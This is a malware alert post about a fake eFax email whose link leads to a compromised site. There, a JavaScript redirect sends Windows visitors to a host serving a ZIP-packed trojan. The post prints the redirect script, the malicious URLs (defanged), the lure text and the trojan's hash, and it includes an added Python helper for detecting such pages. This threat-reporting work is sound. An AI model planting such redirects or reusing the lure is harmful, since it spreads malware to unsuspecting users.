Fake email eFax message contains URL that leads to malicious ZIP archive


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “eFax message from “02086164497” – 1 page(s), Caller-ID: 208-616-4497”.

This email is sent from the spoofed address “eFax <message@inbound.*******>” and has the following body:

Fax Message [Caller-ID: 208-616-4497]
You have received a 1 page fax at 2014-10-05 11:34:48 GMT.

* The reference number for this fax is lon2_did11-2974913177-8345459349-35.

Please visit https://www.efax.co.uk/myaccount/message/lon2_did11-2974913177-8345459349-35 to view this message in full.

Thank you for using the eFax service!

Screenshot of the email:

The embedded URL hxxp://lanuez.cl/wp-content/themes/cityhub/mess.html leads to a redirect page with the following script:

<script>
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";
var1=112;
var2=var1;
if(OSName=="Windows") {location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}
</script>

This script clearly shows that the campaign targets Windows users: the browser's navigator.appVersion string is checked, and only Windows visitors are sent to the malicious host, while everyone else is redirected to a Google search for “efax”. The site hxxp://200.59.14.44:8080/ord/ef.html shows the following layout and allows the visitor to download the malicious fax in ZIP format.
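As an added defender-side example (not code from the MX Lab post), the following Python triage helper flags an OS-gated redirect page of the kind shown above and extracts its redirect targets in defanged form. The sample HTML is constructed to mirror the script above, and the list of "decoy" hosts is an assumption for this campaign.

```python
import re
from urllib.parse import urlsplit

# Constructed sample reproducing the structure of the redirect page above (not fetched live).
SAMPLE_HTML = """<html><body><script>
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
var1=112;
var2=var1;
if(OSName=="Windows") {location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}
</script></body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# Client-side OS/browser fingerprinting properties commonly used to gate a redirect.
FINGERPRINT_RE = re.compile(r"navigator\.(appVersion|userAgent|platform|oscpu)")
# location.replace("..."), location.assign("..."), location = "...", location.href = "..."
REDIRECT_RE = re.compile(
    r"""(?:location\.(?:replace|assign)\(|location(?:\.href)?\s*=)\s*["']([^"']+)["']""")
DECOY_HOSTS = {"google.com", "www.google.com"}  # assumed harmless fall-through targets


def defang(url: str) -> str:
    """Render a URL non-clickable for reports: http -> hxxp, dots in the host -> [.]."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")  # an already-defanged hxxp stays as is
    host = parts.netloc.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


def analyze(html: str) -> dict:
    """Report fingerprinting properties, redirect targets and a suspicious verdict."""
    props, targets = set(), []
    for js in SCRIPT_RE.findall(html):
        props.update(FINGERPRINT_RE.findall(js))
        targets.extend(REDIRECT_RE.findall(js))
    hosts = {urlsplit(t).hostname for t in targets}
    # Suspicious when the page branches on the client OS and sends visitors to more
    # than one host, at least one of which is not a known decoy (here: Google search).
    suspicious = bool(props) and len(hosts) > 1 and bool(hosts - DECOY_HOSTS)
    return {
        "fingerprint_props": sorted(props),
        "targets": [defang(t) for t in targets],
        "suspect_hosts": sorted(h for h in hosts if h not in DECOY_HOSTS),
        "suspicious": suspicious,
    }
```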

The downloaded ZIP file has the name FAX_20141008_1412786088_26.zip and contains the folder FAX_20141008_1412786088_26 with the 61 kB file FAX_20141008_1412786088_26.exe. The numbers in the file names may vary.

The trojan is known as Malware.QVM20.Gen.

At the time of writing, only 1 of the 54 AV engines on VirusTotal detected the trojan, so do not download any files from this host.

Use the VirusTotal permalink for more detailed information.
SHA256: 3dd29684ab081569d4ce723b16f22b7bcc8301df2657177802bc71c7a375307e